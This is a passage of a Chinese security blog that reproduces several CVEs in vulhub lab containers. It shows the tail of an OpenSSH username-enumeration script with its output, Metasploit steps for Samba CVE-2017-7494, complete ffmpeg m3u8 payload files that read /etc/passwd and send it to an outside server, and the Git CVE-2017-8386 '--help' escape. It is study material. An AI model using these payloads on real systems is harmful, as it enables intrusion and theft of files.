            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[-] File doesn't exist or is unreadable."</span><span class="token punctuation">)</span>
            sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span>
        usernames <span class="token operator">=</span> <span class="token builtin">map</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">.</span>strip<span class="token punctuation">,</span> f<span class="token punctuation">.</span>readlines<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        f<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token comment"># map usernames to their respective threads</span>
        pool <span class="token operator">=</span> multiprocessing<span class="token punctuation">.</span>Pool<span class="token punctuation">(</span>args<span class="token punctuation">.</span>threads<span class="token punctuation">)</span>
        results <span class="token operator">=</span> pool<span class="token punctuation">.</span><span class="token builtin">map</span><span class="token punctuation">(</span>checkUsername<span class="token punctuation">,</span> usernames<span class="token punctuation">)</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> args<span class="token punctuation">.</span>outputFile<span class="token punctuation">:</span>
                outputFile <span class="token operator">=</span> <span class="token builtin">open</span><span class="token punctuation">(</span>args<span class="token punctuation">.</span>outputFile<span class="token punctuation">,</span> <span class="token string">"w"</span><span class="token punctuation">)</span>
        <span class="token keyword">except</span> IOError<span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[-] Cannot write to outputFile."</span><span class="token punctuation">)</span>
            sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> args<span class="token punctuation">.</span>outputFormat<span class="token operator">==</span><span class="token string">'json'</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> args<span class="token punctuation">.</span>outputFile<span class="token punctuation">:</span>
                outputFile<span class="token punctuation">.</span>writelines<span class="token punctuation">(</span>exportJSON<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
                outputFile<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[+] Results successfully written to "</span> <span class="token operator">+</span> args<span class="token punctuation">.</span>outputFile <span class="token operator">+</span> <span class="token string">" in JSON form."</span><span class="token punctuation">)</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>exportJSON<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">elif</span> args<span class="token punctuation">.</span>outputFormat<span class="token operator">==</span><span class="token string">'csv'</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> args<span class="token punctuation">.</span>outputFile<span class="token punctuation">:</span>
                outputFile<span class="token punctuation">.</span>writelines<span class="token punctuation">(</span>exportCSV<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
                outputFile<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[+] Results successfully written to "</span> <span class="token operator">+</span> args<span class="token punctuation">.</span>outputFile <span class="token operator">+</span> <span class="token string">" in CSV form."</span><span class="token punctuation">)</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>exportCSV<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> args<span class="token punctuation">.</span>outputFile<span class="token punctuation">:</span>
                outputFile<span class="token punctuation">.</span>writelines<span class="token punctuation">(</span>exportList<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
                outputFile<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[+] Results successfully written to "</span> <span class="token operator">+</span> args<span class="token punctuation">.</span>outputFile <span class="token operator">+</span> <span class="token string">" in List form."</span><span class="token punctuation">)</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span>exportList<span class="token punctuation">(</span>results<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span> <span class="token comment"># no usernames passed in</span>
        <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"[-] No usernames provided to check"</span><span class="token punctuation">)</span>
        sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处我们还需要一个用户名字典，可以自行构造，也可以用github上面一个开源项目<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://github.com/danielmiessler/SecLists/" >SecLists</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>，节约时间我们自行构造一个简短list，最终测试结果如下</p>
<pre class="line-numbers language-none"><code class="language-none">admin is not a valid user!
bin is a valid user!
sys is a valid user!
sync is a valid user!
games is a valid user!
man is a valid user!
lp is a valid user!
111 is not a valid user!
1243 is not a valid user!
sahdsa is not a valid user!
jalba is not a valid user!
dsa is not a valid user!
fe is not a valid user!
qf is not a valid user!
ds is not a valid user!
vc is not a valid user!
dsshg is not a valid user!
rsa is not a valid user!
grdfsbvfgd is not a valid user!
sb is not a valid user!
fgd is not a valid user!
s is not a valid user!
bgfd is not a valid user!
s is not a valid user!
g is not a valid user!
fds is not a valid user!
g is not a valid user!
fd is not a valid user!
sgf is not a valid user!
ds is not a valid user!
g is not a valid user!
fdsh is not a valid user!
tr is not a valid user!
wnbyrsbf is not a valid user!
dgs is not a valid user!
root is a valid user!<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>显然漏洞存在，而当我们对高级版本的SSH进行测试时，exp失效</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202206171757123.png"></p>
</li>
</ol>

        <h2 id="Samba（SMB）"   >
          <a href="#Samba（SMB）" class="heading-link"><i class="fas fa-link"></i></a><a href="#Samba（SMB）" class="headerlink" title="Samba（SMB）"></a>Samba（SMB）</h2>
      
        <h3 id="CVE-2017-7494"   >
          <a href="#CVE-2017-7494" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2017-7494" class="headerlink" title="CVE-2017-7494"></a>CVE-2017-7494</h3>
      <p>漏洞内容：只需要有一个可以写入文件的用户就可以提权到root权限</p>
<p>漏洞作用：RCE</p>
<p>影响范围：Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本</p>
<p>漏洞复现：</p>
<ol>
<li><p>vulhub直接起一个docker</p>
</li>
<li><p>使用msf搜索对应漏洞<code>search is_known_pipename</code></p>
</li>
<li><p>使用set命令设置rhost</p>
</li>
<li><p>如果对方服务开启了匿名登录直接使用run命令即可，如果已知用户名密码可使用set smbuser和smbpass来指定用户登录</p>
</li>
<li><p>成功拿shell</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202208101616840.png"></p>
</li>
</ol>

        <h2 id="ffmpeg"   >
          <a href="#ffmpeg" class="heading-link"><i class="fas fa-link"></i></a><a href="#ffmpeg" class="headerlink" title="ffmpeg"></a>ffmpeg</h2>
      
        <h3 id="CVE-2016-1897"   >
          <a href="#CVE-2016-1897" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2016-1897" class="headerlink" title="CVE-2016-1897"></a>CVE-2016-1897</h3>
      <p>漏洞内容：首先了解一下m3u8文件格式，m3u8是一种索引文件，用于HLS协议传输媒体流，m3u8索引指向一个个小的媒体流碎片</p>
<blockquote>
<p>简而言之，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://links.jianshu.com/go?to=https://zh.wikipedia.org/wiki/HTTP_Live_Streaming" >HLS</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 是新一代流媒体传输协议，其基本实现原理为将一个大的媒体文件进行分片，将该分片文件资源路径记录于 m3u8 文件（即 playlist）内，其中附带一些额外描述（比如该资源的多带宽信息···）用于提供给客户端。客户端依据该 m3u8 文件即可获取对应的媒体资源，进行播放。</p>
</blockquote>
<p>一个基本的m3u8文件格式如下</p>
<blockquote>
<ul>
<li><p>m3u8 文件必须以 utf-8 进行编码，不能使用 Byte Order Mark（BOM）字节序， 不能包含 utf-8 控制字符（U+0000 ~ U_001F 和 U+007F ~ u+009F）。</p>
</li>
<li><p>m3u8 文件的每一行要么是一个 URI，要么是空行，要么就是以 <strong>#</strong> 开头的字符串。不能出现空白字符，除了显示声明的元素。</p>
</li>
<li><p>m3u8 文件中以 <strong>#</strong> 开头的字符串要么是注释，要么就是标签。标签以 <strong>#EXT</strong> 开头，大小写敏感。</p>
</li>
<li><p>```<br>各参数说明：<br>#EXTM3U 标签是 m3u8 的文件头，开头必须要这一行<br>#EXT-X-MEDIA-SEQUENCE 表示每一个media URI 在 PlayList中只有唯一的序号，相邻之间序号+1<br>#EXTINF:10.0, 表示该一段 TS 流文件的长度<br>#EXT-X-ENDLIST 这个相当于文件结束符</p>
<pre class="line-numbers language-none"><code class="language-none">
&#96;&#96;&#96;m3u8
#EXTM3U
#EXT-X-TARGETDURATION:10
#EXTINF:9.009,
http:&#x2F;&#x2F;media.example.com&#x2F;first.ts
#EXTINF:9.009,
http:&#x2F;&#x2F;media.example.com&#x2F;second.ts
#EXTINF:3.003,
http:&#x2F;&#x2F;media.example.com&#x2F;third.ts
#EXT-X-ENDLIST<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></li>
</ul>
</blockquote>
<p>而在ffmpeg特定版本中并没有对URI进行任何检查，此处可导致SSRF，只需要监听一个端口然后直接访问即可验证</p>
<p>任意文件读取成因是在ffmpeg中有concat函数可以对URI进行拼接，我们只要将文件作为http请求的参数即可带出，但直接使用concat并不会对文件请求访问，所以我们需要一个小技巧，也就是通过主m3u8访问次级m3u8来使得文件被读取</p>
<p>kkk.txt</p>
<pre class="line-numbers language-none"><code class="language-none">#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http:&#x2F;&#x2F;xxx&#x2F;test.txt|file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd
#EXT-X-ENDLIST<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>text.txt</p>
<pre class="line-numbers language-none"><code class="language-none">#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http:&#x2F;&#x2F;xxx&#x2F;?<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>xxx.m3u8</p>
<pre class="line-numbers language-none"><code class="language-none">#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:10.0,
concat:http:&#x2F;&#x2F;xxx&#x2F;kkk.txt
#EXT-X-ENDLIST<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>将kkk.txt和text.txt都上传到服务器，然后用ffmpeg处理xxx.m3u8文件即可带出passwd文件首行</p>

        <h2 id="Git"   >
          <a href="#Git" class="heading-link"><i class="fas fa-link"></i></a><a href="#Git" class="headerlink" title="Git"></a>Git</h2>
      
        <h3 id="CVE-2017-8386"   >
          <a href="#CVE-2017-8386" class="heading-link"><i class="fas fa-link"></i></a><a href="#CVE-2017-8386" class="headerlink" title="CVE-2017-8386"></a>CVE-2017-8386</h3>
      <p>漏洞成因：</p>
<ul>
<li><p>当我们想从github克隆一份代码下来的时候，会有ssh克隆的选项，我们去随便捞一个地址，找到Clone with SSH里列出的地址：<code>git@github.com:Jlan45/j1an.github.io.git</code>其实就是通过ssh协议连接github使用git用户将这个文件搞下来</p>
</li>
<li><p>那我们猜想一下，是不是直接ssh链接就能和我们链接一个服务器一样去执行命令呢</p>
</li>
<li><p>测试发现我们确实连接上了服务器，但是服务器给我们弹了一句话就让我们强制退出了</p>
</li>
<li><p>这是怎么做到的咧</p>
</li>
<li><blockquote>
<p>那么，github这类git服务商是怎么实现上述“安全”通信的流程的呢？</p>
<p>让用户可以通过ssh认证身份，但又不给用户shell，这个过程有两种方法实现：</p>
<p>创建系统用户git的时候将其shell设置成git-shell<br>在authorized_keys文件每个ssh-key的前面设置command，覆盖或劫持重写原本的命令<br>第一种方法比较直观，就是创建用户的时候不给其正常的bash或sh的shell，而是给它一个git-shell。git-shell是一个沙盒环境，在git-shell下，只允许执行沙盒内包含的命令。<br>————————————————<br>版权声明：本文为CSDN博主「建瓯最坏」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。<br>原文链接：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/JiangBuLiu/article/details/95065034" >https://blog.csdn.net/JiangBuLiu/article/details/95065034</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
</blockquote>
</li>
<li><p>在github中确实是只有这三条命令可用</p>
<ul>
<li><code>git-receive-pack &lt;argument&gt;</code></li>
<li><code>git-upload-pack &lt;argument&gt;</code></li>
<li><code>git-upload-archive &lt;argument&gt;</code></li>
</ul>
</li>
<li><p>但是后面有了参数，我们就可以通过–help来打开一个man页面，并且其会自动调用less命令，而通过less命令我们就能直接通过<code>shift+e</code>键来实现任意文件读取，甚至可以通过<code>!命令</code>来实现任意命令执行</p>
</li>
</ul>
<p>漏洞内容：通过github的SSH实现任意文件读取</p>
<p>漏洞复现：</p>
<ol>
<li><p>首先还是vulhub启一个服务器，可以看到目录下有id_rsa私钥文件，我们直接通过这个私钥来连接docker，并且执行<code>git-upload-archive &#39;--help&#39;</code>命令</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202209010033494.png"></p>
<p>可以看到命令执行成功进入了man页面</p>
</li>
<li><p>尝试读取/etc/passwd<img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202209010034597.png"></p>
<p>读取成功</p>
</li>
</ol>
<script type="text&#x2F;javascript" src="https://unpkg.com/kity@2.0.4/dist/kity.min.js"></script><script type="text&#x2F;javascript" src="https://unpkg.com/kityminder-core@1.4.50/dist/kityminder.core.min.js"></script><script defer="true" type="text&#x2F;javascript" src="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.js"></script><link rel="stylesheet" type="text&#x2F;css" href="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.css"></div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://jlan.darkflow.top">J1an</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://jlan.darkflow.top/posts/67caa546.html">http://jlan.darkflow.top/posts/67caa546.html</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/posts/8f3824ff.html"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">JavaScript与Nodejs</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/posts/ad1540aa.html"><span class="paginator-prev__text">破破烂烂碎碎知识汇总</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CVE"><span class="toc-number">1.</span> <span class="toc-text">
          CVE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#OpenSSH"><span class="toc-number">1.1.</span> <span class="toc-text">
          OpenSSH</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2018-15473"><span class="toc-number">1.1.1.</span> <span class="toc-text">
          CVE-2018-15473</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Samba%EF%BC%88SMB%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">
          Samba（SMB）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2017-7494"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          CVE-2017-7494</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ffmpeg"><span class="toc-number">1.3.</span> <span class="toc-text">
          ffmpeg</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2016-1897"><span class="toc-number">1.3.1.</span> <span class="toc-text">
          CVE-2016-1897</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Git"><span class="toc-number">1.4.</span> <span class="toc-text">
          Git</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2017-8386"><span class="toc-number">1.4.1.</span> <span class="toc-text">
          CVE-2017-8386</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/head.png" alt="avatar"></div><p class="sidebar-ov-author__text">生命不息，折腾不止！</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/zhisenyu" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://www.youtube.com/channel/UCarZXyGTzWssmNANey0TC3g" target="_blank" rel="noopener" data-popover="Youtube" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-youtube"></i></span></a><a class="sidebar-ov-social-item" href="z405454586" target="_blank" rel="noopener" data-popover="微信" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="tencent://message?uin=405454586" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">73</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">11</div><div class="sidebar-ov-state-item__name">标签</div></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>J1an</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.0.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div><div>已经是Dest0g3的菜狗了</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="0,0,0" opacity="0.6" count="150" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.xml';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

